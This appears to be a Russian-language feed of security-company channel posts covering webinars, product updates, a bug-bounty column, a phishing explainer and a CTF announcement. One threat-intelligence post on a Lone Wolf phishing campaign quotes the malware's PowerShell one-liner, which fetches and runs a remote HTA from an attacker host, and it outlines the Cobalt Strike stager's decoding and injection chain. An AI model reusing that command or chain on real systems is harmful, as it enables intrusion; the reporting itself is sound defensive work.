Если вы используете одну из предыдущих версий приложения, от CVE-2025–29927 защитит BI.ZONE WAF. Мы блокируем использование внутреннего заголовка x-middleware-subrequest. Правило включено по умолчанию для всех наших клиентов. 

Также правила обнаружения этой уязвимости в рамках активного сканирования уже добавлены в BI.ZONE CPT.

🌝 Киберразведданные на практике: как получить максимум

Данные киберразведки — это не только потоки индикаторов компрометации, но и важный источник аналитической информации об актуальных киберугрозах. Правильное применение этих сведений на практике позволяет не только быстро обнаруживать угрозы и реагировать на них, но и предсказывать, а также предотвращать возможные атаки.

Такой подход к безопасности данных называется угрозоцентричным. Именно о нем пойдет речь на вебинаре 8 апреля.

Команда BI.ZONE Threat Intelligence расскажет:

🟦Как инструмент «Теневые ресурсы» поможет проактивно искать угрозы для вашей организации. 
🟦Как узнать об угрозах, нацеленных на вашу компанию, при помощи матрицы MITRE ATT&CK. 
🟦Чем знания о реальных атаках помогут компании защититься от злоумышленников. 

Бонус: оставляйте вопросы в специальном поле при регистрации — в конце вебинара ответят на самые интересные из них, а авторы лучших по традиции получат призы. 

Спикеры:

🟦Олег Скулкин, руководитель BI.ZONE Threat Intelligence. 
🟦Дарья Себякина, старший продуктовый маркетолог. 

Когда: 8 апреля, вторник, 11:00–12:30 (мск).

Зарегистрироваться

🔒 Обсуждаем identity security как подход

Киберпреступники чаще всего закрепляются в инфраструктуре через скомпрометированные легитимные учетные записи, в том числе привилегированные. Поэтому защита идентификационных данных и контроль доступа — ключевые элементы кибербезопасности организаций.

26 марта на онлайн-конференции AM Live эксперты разберут подход identity security:

🔵Задачи, которые он решает.
🔵ITDR-подход и его связь с identity security.
🔵Типичные ошибки и лучшие практики внедрения.
🔵Будущее identity security: основные векторы развития в ближайшие 1–2 года.

От нас выступит Артём Назаретян, руководитель BI.ZONE PAM. Приходите послушать!

➡️Зарегистрироваться

🌝 Эффективная логика обнаружения угроз в SOC

Детектирующая логика — основа мониторинга и реагирования на киберугрозы. К ней относится любой контент, позволяющий выявлять атаки:

🔵правила корреляции в SIEM-системе,
🔵сигнатуры NTA,
🔵правила обнаружения EDR,
🔵YARA-правила и т. д.

За семь лет работы нашего SOC мы собрали большую базу контента. Используем ее не только в BI.ZONE TDR, но и для того, чтобы помогать другим компаниям строить свой собственный центр мониторинга.

В статье, посвященной детектирующей логике, рассказали:

🟦про этапы разработки контента,
🟦формирование идей и гипотез,
🟦критерии эффективности правил.

Читать статью

⚙️ BI.ZОNE GRC: как работать в 5 раз быстрее, объединив 10 систем в 1

За последнее время количество задач и нагрузка на CISO значительно выросли. Как справиться с вызовами и высвободить ресурсы на стратегические задачи?

27 марта на вебинаре обсудим:

🟦Какие 3 основные задачи есть у CISO.
🟦Как управлять IT-активами при построении кибербезопасности.
🟦Почему важен процесс управления уязвимостями и с какими проблемами сталкиваются компании.
🟦Как эффективно выполнять требования по ПДн и КИИ.
🟦Как управлять кибербезопасностью в группе компаний или холдинге.
🟦Что умеет BI.ZONE GRC.

Приглашенные эксперты поделятся опытом. Вы узнаете, какие были сложности в управлении уязвимостями и активами у крупного облачного провайдера, а также как выстраивали комплаенс по ПДн в группе компаний.

В конце мероприятия вы сможете задать вопросы.

Спикеры:

🟦Андрей Быков, руководитель BI.ZONE GRC.
🟦Кирилл Карпиевич, специалист по анализу уязвимостей, «СберТех». 
🟦Андрей Шаврин, начальник отдела информационной безопасности, «МУЗ-ТВ». 

Кому будет полезно:

🟦Руководителям по кибербезопасности (CISO). 
🟦IT-директорам и CIO. 
🟦Специалистам по комплаенсу и управлению рисками. 
🟦Экспертам по кибербезопасности и аудиторам. 

Когда: 27 марта, четверг, 11:00–12:30 (мск). 

Зарегистрироваться

🔔 Через час встречаемся на онлайн-релизе BI.ZONE Mail Security

Разберем актуальные для корпоративной почты угрозы и методы защиты от них, презентуем решение BI.ZONE Mail Security и ответим на ваши вопросы.

За самые интересные подарим призы.

Подключайтесь в 11:00!

🔔 Дарим призы за ваши вопросы

Уже завтра на онлайн-релизе BI.ZONE Mail Security мы разберем, как злоумышленники действуют через корпоративную почту, какие уязвимости чаще всего эксплуатируют и почему классические фильтры уже не справляются.

Авторам самых интересных вопросов подарим пауэрбанки.

➡️Регистрируйтесь и задавайте вопросы

Подводные камни выхода на багбаунти: часть 2. Проверяйте все системы, даже если баг найден в одной из них.

Андрей Левкин, руководитель продукта BI.ZONE Bug Bounty, оунер трека AppSec на OFFZONE, выпускник МГТУ имени Баумана, специально для канала Sachok написал серию колонок про нюансы выхода на Баг Баунти.

В прошлый раз я разобрал, какие трудности поджидают компании на старте багбаунти.

А сегодня обсудим ситуации, которые могут стать критичными для организации, даже если она уже работает с багхантерами.

Представьте, что исследователи принесли уязвимость. Возможно, критическую. Какие ошибки чаще всего допускают в такой ситуации?

Ошибка 1. Забыть про другие сервисы

Проверить все сервисы на эту же уязвимость — правильная мысль, хотя это может быть долго и сложно.

Главная трудность в том, что для такой проверки нужно хорошо понимать внутрянку продуктов.

Например, нашли уязвимость в одном из модулей. Нужно идентифицировать, где еще может быть этот баг, и скорее его закрыть. Для этого надо хорошо знать свои сервисы и представлять, какая система что за собой тянет.

Ошибка 2. Не проверить, успели ли злоумышленники воспользоваться багом

В нашей практике были разные случаи. Что-то обошлось без последствий, но были и менее удачные кейсы, когда хакерам удавалось проэксплуатировать найденные уязвимости.

Такие ошибки довольно часто встречаются, хотя и кажутся на первый взгляд очевидными. Чем быстрее выяснится, успел ли кто-то проникнуть в систему до вас, тем лучше.

Проверка позволит понять, что происходит внутри продуктов, и предотвратить инциденты. Например, когда злоумышленники попали в инфраструктуру и с помощью обнаруженной уязвимости украли данные.

Вывод прост. Исправляйте баги не только в той системе, где его нашли, но и проверяйте все похожие ресурсы. Опережайте злоумышленников на поворотах.

@cybersachok

🔔 Вы выиграли приз! Чтобы забрать его, нужно всего лишь...

В последние полгода фишинговая схема с фальшивыми розыгрышами снова стала популярной у злоумышленников.

По данным специалистов BI.ZONE Mail Security и BI.ZONE Brand Protection, каждый месяц мошенники отправляют корпоративным пользователям десятки тысяч писем с предложением получить приз.

Схема старая, но все еще актуальная. Вот как она работает:

1️⃣Человеку приходит письмо, в котором сообщается, что он выиграл приз.

2️⃣В письме ссылка на сайт, где пользователю предлагают забрать выигрыш.

3️⃣Жертва переходит по ссылке и попадает на страницу, на которой якобы проводится розыгрыш.

4️⃣Пользователю сообщают, что он выиграл крупную сумму, но для ее получения нужно ввести данные банковской карты и оплатить комиссию.

5️⃣Жертва теряет деньги, а мошенники могут получить доступ к платежной информации.

О том, как злоумышленники совершенствуют известную схему, читайте на сайте.

⚡️ Онлайн-релиз BI.ZONE Mail Security

С каждым годом атаки на корпоративную почту становятся все сложнее: злоумышленники подделывают домены и данные отправителей, имитируют стиль переписки.

На мероприятии мы поговорим об актуальных угрозах и расскажем:

🔵Как BI.ZONE Mail Security блокирует сложные атаки.
🔵Анализирует поведение пользователей и адаптируется к новым угрозам.
🔵Защищает не только почтовые ящики, но и пользователей.

А еще ответим на ваши вопросы. За самые интересные подарим призы (скоро расскажем, какие).

Когда: 20 марта, четверг, 11:00–12:30 (мск).

➡️Зарегистрироваться

⁉️ Что ждет российский рынок SOC

Объем рынка услуг SOC в России к настоящему времени составляет около 24–25 млрд рублей и растет примерно на 30% в год.

В последние годы компании стали больше внимания уделять кибербезопасности. У нас увеличилось число клиентов, которые обращаются за SOC-услугами.

Выросло и количество поставщиков на рынке: сейчас это около 20 крупных компаний и множество малоизвестных локальных SOC.

В интервью «Интерфаксу» директор департамента мониторинга, реагирования и исследования киберугроз Теймур Хеирхабаров рассказал, какие изменения ждут рынок SOC и как трансформируются модели оказания таких услуг.

Читать интервью

🦴 Вы задолжали Lone Wolf: атакующие рассылают загрузчик Cobalt Strike под видом документов о финансовой задолженности

С начала марта злоумышленники из Lone Wolf реализовали несколько фишинговых кампаний.

Письма с темой «Актуальная задолженность(просроченная)» рассылались в российские логистические, производственные, финансовые организации и компании из сферы розничной торговли. К письму был прикреплен запароленный архив «выписка.zip». 

Интересно, что для обхода автоматизированных средств защиты, умеющих «подставлять» пароль из тела письма для сканирования вложений, злоумышленники использовали фразу «пароль к архиву одна единица».

Внутри архива — ярлык Windows «Выписка.lnk». При его открытии жертвой происходила компрометация системы, а на устройство загружался Cobalt Strike Stager в следующей последовательности: 

1. PowerShell-скрипт, содержащийся в LNK-файле, загружал HTA-файл по ссылке zetag[.]ru/z[.]hta.

powershell .(gp -pa 'HKLM:\SOF*\Clas*\Applications\msh*e').('PSChildName')http://zetag[.]ru/z.hta

2. Файл z.hta, содержащий закодированный с помощью Base64 и запакованный утилитой GZIP PowerShell-скрипт, декодировал еще одну стадию — снова PowerShell-скрипт. 

3. Шелл-код с экземпляром Cobalt Strike Stager декодировался сначала с помощью Base64, потом путем операции XOR с ключом 0x35 и внедрялся в адресное пространство процесса PowerShell. 

Полученный доступ к корпоративным сетям злоумышленники использовали для распространения программ-вымогателей.

🌜 Разобрали до кварков: вышла запись эфира «Киберразведка решает все»

В студии AM Live поговорили о threat intelligence. Эксперты разобрали, как киберразведданные помогают компаниям выявлять угрозы на ранней стадии и предупреждать атаки до того, как они нанесут ущерб. А также обсудили, как правильно:

🟦применять киберразведданные,
🟦выстроить непрерывный процесс киберразведки,
🟦внедрить актуальные подходы к сбору данных и управлению процессами. 

Смотреть запись

Читать обзор эфира

А еще напоминаем, что недавно вышло обновление BI.ZONE Threat Intelligence. С новым инструментом «Теневые ресурсы» компаниям будет проще предсказывать кибератаки и минимизировать последствия утечек.

🌚 Гибкий график и своевременные выплаты: кибершпионы Squid Werewolf маскируются под рекрутеров

Кластер активности Squid Werewolf занимается шпионажем с 2012 года и обычно атакует страны Азии и Ближнего Востока. Чаще всего жертвами злоумышленников становятся государственные, оборонительные и промышленные организации. 

Характерный почерк кибершпионов — рассылка фишинговых писем от имени регуляторов или иных ведомств. Но в декабре 2024 года эксперты BI.ZONE Threat Intelligence обнаружили необычную кампанию.

Злоумышленники выдали себя за рекрутеров и отправили сотруднику российской компании письмо с предложением рассмотреть вакансию в реальной промышленной организации. Жертву выбрали из ключевых работников, на компьютере которых могли храниться ценные сведения.

К письму с предложением о работе атакующие добавили файл, где якобы указали размер зарплаты. По задумке злоумышленников, когда пользователь откроет вложение,  вредоносное ПО автоматически загрузится. Так группировка рассчитывала получить доступ к чувствительным данным.

Подробно о новой атаке Squid Werewolf рассказали в статье.

🚀 Открыта регистрация на Learning Bear 2025! 🚀

Готовы к вызову? Время начать игру.

📅 Регистрация уже доступна. Не теряйте время!

🕛 Старт соревнований — 8 марта в 12:00 по московскому времени.

💡 Важно знать:

☑️Участвовать может любой желающий из любой точки России, возраст 18+.
☑️Игра с индивидуальным зачётом.
☑️Укажите ваш вуз и город — это поможет нам с организацией.
☑️Мы автоматически пригласим лучших 30 участников на площадку МИФИ в Сириусе на большой модуль Learning Bear.
☑️Длительность соревнований — 24 часа.

Жмите на ссылку и заполняйте форму!
🔗 https://ctfd.digital.mephi.ru/

Следите за подробностями:
https://t.me/+ij1n3qDhb1gyMGM6
https://vk.com/learningbearclub


#LearningBear2025 #РегистрацияОткрыта #CTF #ИнформационнаяБезопасность

Наши друзья из @volgactf готовят еще один не менее интересный проект для студентов — Learning Bear 2025.

Регистрация открыта. По итогам отборочных вас ждет неделя обучения на площадке МИФИ в «Сириусе».

Попробуйте свои силы, поездка в Сочи и крутой контент по киберзопасности лишними не бывают 🚀

💼 Обновили модуль для работы с персональными данными в BI.ZONE GRC

Мы добавили в модуль Compliance Management на платформе BI.ZONE GRC возможности, которые помогут автоматизировать рутинные задачи и лучше контролировать процессы.

Что нового:

🔵Автоматическая загрузка данных из IT-инфраструктуры через коннекторы
Теперь информация из вашей инфраструктуры попадает на платформу автоматически. А если с документами что-то не сходится, система уведомит об этом пользователей модуля для управления активами (Asset Management).

🔵Групповое редактирование процессов
Больше не нужно тратить много времени на отдельные правки в реестре, можно изменять сразу несколько записей.

🔵Автоматическое заполнение реестра процессов
Система сама формирует реестр и поддерживает его актуальность.

🔵Постоянная поддержка актуальной документации
Теперь не нужно тратить ресурсы, чтобы следить за изменениями в законодательстве: при выходе новых версий документы в системе обновляются автоматически. Если они устареют, их можно отправить в архив.

🔵Возможность рассчитать размер рисков
Платформа сама подскажет, какая ответственность может быть при несоблюдении требований законодательства в процессах.

Подробнее об обновлении

🔍 Гид по BI.ZONE TDR

Подготовили список полезных материалов про работу нашего SOC, которые вы могли пропустить.

🔵BI.ZONE TDR: мониторинг на опережение
Вебинар, где мы демонстрируем работу сервиса на реальных примерах и рассказываем об организации процессов.

🔵Threat Prediction: превентивная работа с угрозами в BI.ZONE TDR
Статья о технологиях, которые обеспечивают нашим клиентам проактивный подход к кибербезопасности.

🔵Разработка детектирующей логики в современном SOC
Подкаст о детектирующей логике: на что обращать внимание при ее разработке и как правильно приоритизировать киберугрозы.

🔵Как выбрать MSSP и за какими технологиями будущее
Статья о технологиях для высокой эффективности SOC. Вы узнаете, можно ли осуществлять мониторинг без доступа EDR-агентов в интернет и правда ли, что будущее за XDR.

А чтобы оценить возможности BI.ZОNE TDR на практике, попробуйте сервис бесплатно.

⭐️ Материалы BI.ZONE Cybersecurity Meetup #5

На митапе обсудили, как аналитикам SOC быстрее выполнять рутинные задачи, укрощать алерты и использовать ИИ.

Спасибо спикерам за интересные доклады, а зрителям — за то, что пришли!

Презентации можно скачать здесь.

Ищите себя на фотографиях и делитесь ими с друзьями. 

До новых встреч ;)